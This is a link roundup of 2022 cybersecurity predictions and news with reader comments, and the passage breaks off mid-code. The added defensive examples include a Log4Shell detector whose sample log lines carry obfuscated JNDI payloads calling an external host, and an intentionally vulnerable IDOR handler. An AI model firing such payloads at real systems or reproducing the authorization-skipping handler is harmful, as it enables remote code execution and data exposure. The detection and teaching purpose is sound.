Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks, cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research, development, and investment. Advanced 5G and wireless networks will bring higher traffic capacities, lower latency, and increased reliability, and enable processing and analytics in real time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated in searching for vulnerabilities and delivering malware by adapting and automating their tooling with machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original vulnerability (CVE-2021-44228) and later findings in the same library (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). CVE-2021-42550, often listed alongside them, is a related issue in the Logback logging library rather than in Log4j.
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
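The Google and Akamai pieces above turn on the same two facts: log4j-core sits deep in dependency trees, and the `${jndi:...}` lookup string can be disguised in many ways, so a plain grep for `jndi` misses most in-the-wild probes. The following Python is added here as an editor's example and is not code from either article. It undoes URL encoding and the common nested-lookup tricks (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) before matching, and runs over a few constructed access-log lines; the IP addresses, paths and timestamps are made up for the demonstration, and the set of lookup forms it emulates is an assumption about what is common rather than a complete Log4j substitutor.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# Innermost ${...} lookup (no nested braces inside). Log4j 2 resolves lookups
# from the inside out, which is exactly what obfuscated payloads rely on.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The real thing once the disguise is stripped: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def _resolve(body: str) -> str:
    """Emulate the handful of lookup forms attackers use only to hide the
    string 'jndi'. Assumption: lower/upper and the ':-' default-value syntax
    (as in ${::-j} or ${env:NOPE:-j}) cover the common in-the-wild variants."""
    if ":-" in body:                       # ${anything:-X} -> "X"
        return body.split(":-", 1)[1]
    name, _, arg = body.partition(":")
    if name.lower() == "lower":
        return arg.lower()
    if name.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"               # unknown lookup: leave it in place


def normalise(s: str) -> str:
    """Collapse nested lookups until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _LOOKUP.sub(lambda m: _resolve(m.group(1)), s)
    return s


def find_log4shell(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one hit per log line that carries a JNDI lookup, after undoing
    URL encoding (single or double) and lookup-based obfuscation."""
    hits: List[Dict[str, object]] = []
    for n, raw in enumerate(lines, 1):
        norm = normalise(unquote(unquote(raw)))
        m = _JNDI.search(norm)
        if m:
            hits.append({"line": n, "scheme": m.group(1).lower(),
                         "payload": norm[m.start():m.start() + 60]})
    return hits


# Constructed sample access-log lines (not real traffic): a plain probe, two
# lookup-obfuscated probes, a URL-encoded probe, and a benign line.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:14:02:12 +0000] "GET /?x=${${lower:j}ndi:'
    '${lower:l}dap://203.0.113.7/b} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${env:NOPE:-n}${::-d}${::-i}:${::-r}mi://203.0.113.7/c}"',
    '10.0.0.8 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=%24%7Bjndi%3Adns%3A'
    '%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /docs/${version} HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_log4shell(SAMPLE_LOG):
        print(f"line {hit['line']}: scheme={hit['scheme']} {hit['payload']}")
```

Running it flags lines 1 to 4 (schemes ldap, ldap, rmi, dns) and leaves the benign `${version}` line alone. Matching on the normalised string, rather than on the raw bytes, is the point: the same detector serves for both the opportunistic mass scans and the more targeted variants the Akamai post describes, and it also tells you which scheme the attacker tried, which is useful when deciding whether an egress block on LDAP/RMI would have stopped the callback.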
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.
In 2022, security will be Linux and open-source developers’ job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28% while Windows users declined by 3%. Its real trouble isn’t so much with open source itself. There’s nothing magical about open-source methodology and security; security mistakes can still enter the code. Linus’s law says that given enough eyeballs, all bugs are shallow, but if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law (“Security is a process, not a product”) points out, constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We’ve covered five main topics:
1 Malware
2 Mobile
3 Machine Learning and AI
4 Ransomware (because we simply couldn’t not give it a section of its own)
5 Where next?
PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
• Critical Infrastructure (CI) and supply chains will be targeted even more in 2022 (by state-sponsored actors and cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find the root causes of an incident by looking back at change and anomaly indicators in the network activity.
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence (CTI) reports. Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activity on a given network and detect cyber threats more rapidly.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Mobile phone security is being reworked (Kännyköiden tietoturva menee uusiksi)
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in a TEE (Trusted Execution Environment), an isolated execution world of the application processor with its own protected memory. The current standard smartphone security solution is typically built on Arm’s TrustZone technology. The phone’s own security rests on the TEE, and secure boot usually involves it as well. The TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by a TEE has not been available in the small microcontrollers used for embedded applications. Manufacturers have promoted secure boot and memory or flash encryption instead, but these have been fairly weak solutions. Recently, Arm’s TrustZone-M has brought a new security model to microcontrollers.
In recent years this picture has begun to diversify, and a revolution is now underway. Google’s Android Keystore lets an application generate a key that the system holds on its behalf and use it to authenticate to services (this still relies on the TEE).
In the future, encryption keys, for example, will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s Helsinki System Security Lab (HSSL). Five years ago Intel introduced SGX for PC and server processors; SGX is a set of security extension instructions added to the CPU. In this model the TEE-type protections are provided by a secure enclave, which needs less code than a traditional TEE structure. An enclave is a temporary structure in device memory: it is created only for the security-sensitive task and torn down when that task completes. This differs significantly from the TEE structure, where a second kernel runs all the time alongside the operating system. When there is no parallel kernel, there is one component less to attack.
In Intel’s SGX, enclave memory is held in a dedicated Enclave Page Cache of limited size, which restricted what could practically run in an enclave. Intel has sought to overcome this limitation with its newer TDX (Trust Domain Extensions) technology, which protects whole virtual machines; AMD takes the same VM-level approach with its own SEV (Secure Encrypted Virtualization).
Enclave-style structures are also coming to smartphones. The new Armv9-A architecture announced last year adds a Realm world (part of the Arm Confidential Compute Architecture) that is very close to the server-side technologies such as Intel SGX and TDX. With the coming enclaves, an in-principle unlimited number of secured environments will be available.
In the mobile ecosystem the TEE is so deeply rooted that the transition will probably take five years. During the transition period, the TEE and more dynamic solutions will coexist on the market.
Cyber attacks already threaten goods deliveries too (Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin)
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime, extending it from technically savvy individuals and criminal organizations to anyone. The new “Everything as a Service” model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll warns of a “cyber pandemic”: an internet disruption could throw the world into chaos again (Jarno Limnéll varoittaa “kyberpandemiasta”: internetin häiriö voi panna maailman taas sekaisin)
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are the scams, and the scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in a direction where technology evolves faster and faster, which rather increases the possibility of various disruptions and creates new types of vulnerabilities. There is no seamless security,” Limnéll says. So technology will not make the world complete either. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Cyber attacks are accelerating, but companies can respond to them (Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin)
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them. A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown dramatically. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Trend Micro’s recommendations are:
• Enhanced server security and application management policies to combat extortion
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• An extended detection and response (XDR) model to detect attacks on large networks
Trend Micro report: in the future everything is at risk (Trend Micron raportti: tulevaisuudessa kaikki on vaarassa)
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
The Elite Hackers of the FSB
For almost two decades, hackers known as Snake have been forcing their way into government networks. They are considered one of the most dangerous hacker groups in the world. Who they work for, though, has always been a matter of pure speculation. But reporters with German public broadcasters have discovered some clues, and they all lead to the Russian secret service FSB.
https://interaktiv.br.de/elite-hacker-fsb/en/index.html
Tomi Engdahl says:
https://scitechdaily.com/r2c-an-open-source-tool-for-software-security/
Tomi Engdahl says:
https://capt-meelo.github.io//redteam/maldev/2021/12/15/lazy-maldev.html
Tomi Engdahl says:
https://www.iflscience.com/technology/man-accidentally-cuts-off-town-internet-while-trying-to-block-kid-from-social-media/
Tomi Engdahl says:
How to secure your home and office network: The best DNS blockers and firewalls
Solid antivirus protection isn’t enough anymore. Here’s a brief guide to shoring up your SOHO and SMB cybersecurity defenses.
https://www.zdnet.com/article/how-to-secure-your-home-and-office-network-the-best-dns-blockers-and-firewalls/
Tomi Engdahl says:
NIST proposes model to assess cybersecurity investment strategies in network security
The larger the network, the larger the attack surface. Computational models may pinpoint the best places for investment.
https://www.zdnet.com/article/nist-proposes-model-to-assess-cybersecurity-investment-strategies-in-network-security/
Tomi Engdahl says:
GitHub calls for contributions to new cybersecurity Advisory Database
GitHub has already published the full contents of the Advisory Database to encourage collaboration.
https://www.zdnet.com/article/github-calls-for-contributions-to-new-cybersecurity-advisory-database/
Tomi Engdahl says:
Backups ‘no longer effective’ for stopping ransomware attacks
Traditional methods of mitigating ransomware are less efficacious thanks to the rise in double and triple extortion techniques
https://www.computerweekly.com/news/252513735/Backups-no-longer-effective-for-stopping-ransomware-attacks
The growth of double extortion – and even triple extortion – ransomware attacks is in danger of rendering common, traditional methods of mitigating the impact of a ransomware hit, such as well-maintained backups, less efficacious, according to a report from machine identity specialist Venafi.
Tomi Engdahl says:
HPKE: Standardizing public-key encryption (finally!)
https://blog.cloudflare.com/hybrid-public-key-encryption/
For the last three years, the Crypto Forum Research Group of the Internet Research Task Force (IRTF) has been working on specifying the next generation of (hybrid) public-key encryption (PKE) for Internet protocols and applications. The result is Hybrid Public Key Encryption (HPKE), published today as RFC 9180.
HPKE was made to be simple, reusable, and future-proof by building upon knowledge from prior PKE schemes and software implementations. It is already in use in a large assortment of emerging Internet standards, including TLS Encrypted Client Hello and Oblivious DNS-over-HTTPS, and has a large assortment of interoperable implementations, including one in CIRCL. This article provides an overview of this new standard, going back to discuss its motivation, design goals, and development process
Tomi Engdahl says:
How a Saudi woman’s iPhone revealed hacking around the world
https://finance.yahoo.com/news/saudi-womans-iphone-revealed-hacking-100851583.html
An unusual error in NSO’s spyware allowed Saudi women’s rights activist Loujain al-Hathloul and privacy researchers to discover a trove of evidence suggesting the Israeli spyware maker had helped hack her iPhone, according to six people involved in the incident. A mysterious fake image file within her phone, mistakenly left behind by the spyware, tipped off security researchers.
Tomi Engdahl says:
Aviation Attacks Tied To Single APT – TA2541
https://www.bankinfosecurity.com/aviation-attacks-tied-to-single-apt-ta2541-a-18536
Cyberattacks in the aviation sector over the past several years have been tied to a single advanced persistent threat group named TA2541, which – since at least 2017 – has used more than a dozen remote access Trojans to control compromised machines, according to a report from cybersecurity firm Proofpoint.
Tomi Engdahl says:
Thanks, dad: Jammer used to stop kids going online, wipes out a town’s internet by mistake
https://www.zdnet.com/article/thanks-dad-jammer-used-to-control-kids-online-time-father-wipes-out-a-towns-internet-by-mistake/#ftag=RSSbaffb68
The father claimed that his teenagers had become “addicted” to social media and browsing the web since the start of the COVID-19 pandemic, a situation potentially made worse due to social restrictions and lockdowns. The jammer was intended to stop them from covertly using their smartphones to go online when they were meant to be asleep.
However, the jammer also wreaked havoc on connectivity for other residents and the neighboring town.
Tomi Engdahl says:
CISA Compiles Free Cybersecurity Services and Tools for Network Defenders
https://www.cisa.gov/uscert/ncas/current-activity/2022/02/18/cisa-compiles-free-cybersecurity-services-and-tools-network
CISA has compiled and published a list of free cybersecurity services and tools to help organizations reduce cybersecurity risk and strengthen resiliency. This non-exhaustive living repository includes services provided by CISA, widely used open source tools, and free tools and services offered by private and public sector organizations across the cybersecurity community.
Tomi Engdahl says:
GitHub code scanning now finds more security vulnerabilities
https://www.bleepingcomputer.com/news/security/github-code-scanning-now-finds-more-security-vulnerabilities/
Code hosting platform GitHub today launched new machine learning-based code scanning analysis features that will automatically discover more common security vulnerabilities before they end up in production.
Tomi Engdahl says:
Here comes the web browser 100 problem | ZDNet
https://www.zdnet.com/article/here-comes-the-web-browser-100-problem/
Google Chrome and Firefox will both soon release their 100th version — and that could mean trouble for both website developers and web browser users.
Soon both Google Chrome, the most popular of all web browsers, and the Firefox web browser will release their 100th version. Now, besides just being a cool number, there are technical issues that come with these anniversary releases. Some of those issues may cause your websites to fail.
Yes, fail. Here’s why.
All web browsers come with a User-Agent (UA). This is a string that browsers send in HTTP headers so servers can identify the browser; JavaScript also exposes it as navigator.userAgent. Web developers use the UA in all kinds of ways in their server-side programs.
You can check today if your site has such a problem using a Chrome feature flag, which forces Chrome to send a three-digit UA. Then, you can check to see if the new UA is being presented properly by visiting the test site, Is Chrome 100 Yet? Then you can use this browser to check out your own sites for problems. Firefox is also offering similar tests.
https://is-chrome-100-yet.glitch.me/
https://www.otsukare.info/2021/04/20/ua-three-digits-get-ready
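A concrete version of the failure the article describes, as an added example rather than code from ZDNet or the linked test sites: the first parser below uses the fixed two-digit capture and string comparison that many sites shipped, the second accepts any number of digits and compares integers. The UA strings and the minimum-version policy are constructed for the demonstration.

```python
import re
from typing import Optional, Tuple

# Constructed sample User-Agent strings (assumption: representative shapes,
# not taken from the article or from any real client).
UA_CHROME_99 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36")
UA_CHROME_100 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36")
UA_FIREFOX_100 = "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0"

MIN_SUPPORTED = 80  # hypothetical site policy: refuse browsers older than major 80


def major_version_naive(ua: str) -> Optional[str]:
    """The fragile pattern: a fixed two-digit capture returned as text.
    'Chrome/100.0...' matches as '10', so a brand-new browser looks ancient."""
    m = re.search(r"(?:Chrome|Firefox)/(\d\d)", ua)
    return m.group(1) if m else None


def is_supported_naive(ua: str) -> bool:
    v = major_version_naive(ua)
    # String comparison compounds the problem: even a correct "100" would
    # sort below "80" lexicographically.
    return v is not None and v >= str(MIN_SUPPORTED)


def major_version(ua: str) -> Optional[Tuple[str, int]]:
    """Robust parser: any number of digits, anchored on the dot that follows
    the major version, converted to an int before any comparison."""
    m = re.search(r"\b(Chrome|Firefox)/(\d+)\.", ua)
    return (m.group(1), int(m.group(2))) if m else None


def is_supported(ua: str) -> bool:
    parsed = major_version(ua)
    return parsed is not None and parsed[1] >= MIN_SUPPORTED


if __name__ == "__main__":
    for ua in (UA_CHROME_99, UA_CHROME_100, UA_FIREFOX_100):
        print(major_version_naive(ua), is_supported_naive(ua),
              major_version(ua), is_supported(ua))
```

With the naive parser Chrome 99 passes but Chrome 100 and Firefox 100 are both read as version 10 and refused; the integer-based parser accepts all three. Note that Chromium-based browsers such as Edge also carry a `Chrome/` token, so even the corrected regex identifies the engine family rather than the product; feature detection or the User-Agent Client Hints headers are the safer basis for server-side decisions.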
Tomi Engdahl says:
NFTs: New Fraud Targets
https://www.forbes.com/sites/davidbirch/2022/02/20/nfts-new-fraud-targets/
The automation of fraud demands better defences, beginning with digital identity.
Also possible OpenSea smart contract hacking https://web3isgoinggreat.com/?id=2022-02-19-0
Tomi Engdahl says:
Mobile malware evolution 2021
https://securelist.com/mobile-malware-evolution-2021/105876/
In 2021, we observed a downward trend in the number of attacks on mobile users. But it is too early to celebrate: attacks are becoming more sophisticated in terms of both malware functionality and vectors.
Tomi Engdahl says:
Qbot and Zerologon Lead To Full Domain Compromise
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Soon after execution of the Qbot payload, the malware established C2 connectivity and created persistence on the beachhead. Successful exploitation of the Zerologon vulnerability (CVE-2020-1472) allowed the threat actors to obtain domain admin privileges. This level of access was abused to deploy additional Cobalt Strike beacons and consequently pivot to other sensitive hosts within the network. The threat actor then exfiltrated sensitive documents from the environment before being evicted from the network.
Tomi Engdahl says:
US to attack cyber criminals first, ask questions later if it protects victims
https://www.theregister.com/2022/02/21/doj_cyber_offensive_policy/
The United States Department of Justice (DoJ) has revealed new policies that may see it undertake pre-emptive action against cyber threats. Such actions will be undertaken if the DoJ feels that action can reduce risks for victims. Monaco mentioned “providing decryptor keys or seizing servers used to further cyberattacks” as possible interventions.
Tomi Engdahl says:
ENISA and CERT-EU publish set of cybersecurity best practices for public and private organizations
https://www.helpnetsecurity.com/2022/02/21/eu-cybersecurity-best-practices/
The European Union Agency for Cybersecurity (ENISA) and CERT-EU published a joint set of cybersecurity best practices for public and private organizations in the EU.
Tomi Engdahl says:
Mobile device monitoring services do not authenticate API requests
https://kb.cert.org/vuls/id/229438
The backend infrastructure shared by multiple mobile device monitoring services does not adequately authenticate or authorize API requests, creating an IDOR (Insecure Direct Object Reference) vulnerability.
These services and their associated apps can be used to perform non-consensual, unauthorized monitoring and are commonly called “stalkerware.” An unauthenticated remote attacker can access personal information collected from any device with one of the stalkerware variants installed. [Also https://techcrunch.com/2022/02/22/stalkerware-network-spilling-data/
On the front line of the operation is a collection of white-label Android spyware apps that continuously collect the contents of a person’s phone, each with custom branding, and fronted by identical websites with U.S. corporate personas that offer cover by obfuscating links to its true operator. Behind the apps is a server infrastructure controlled by the operator, which is known to TechCrunch as a Vietnam-based company called 1Byte.]
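The CERT/CC note describes the textbook IDOR: the backend resolves a device record from an identifier in the request and never asks whether the caller is allowed to see it. The snippet below is an added illustration, not code from the advisory or from any of the services named; the device records, tokens and handler names are constructed. The vulnerable handler and the hardened one are shown side by side so the difference (an ownership check tied to the authenticated session, with "missing" and "not yours" collapsed into the same response) is visible in a dozen lines.

```python
"""Insecure direct object reference in a device-monitoring API: vulnerable vs. fixed handler.

Added example with constructed data; the record layout and token scheme are assumptions.
"""
from typing import Dict, Optional, Tuple

# Constructed backend state: one record per monitored device, keyed by device id,
# plus bearer tokens mapped to the customer account that owns the session.
DEVICE_RECORDS: Dict[str, Dict] = {
    "dev-1001": {"owner": "acct-17", "contacts": ["+1-555-0100"], "last_location": "40.71,-74.01"},
    "dev-1002": {"owner": "acct-42", "contacts": ["+44-20-7946-0000"], "last_location": "51.50,-0.12"},
}
SESSIONS: Dict[str, str] = {"tok-17": "acct-17", "tok-42": "acct-42"}


class ApiError(Exception):
    def __init__(self, status: int, message: str):
        super().__init__(message)
        self.status = status


def get_device_vulnerable(device_id: str, token: Optional[str] = None) -> Dict:
    """IDOR: the record is looked up by id alone and the token is never examined,
    so any caller who can guess or iterate device ids reads every customer's data."""
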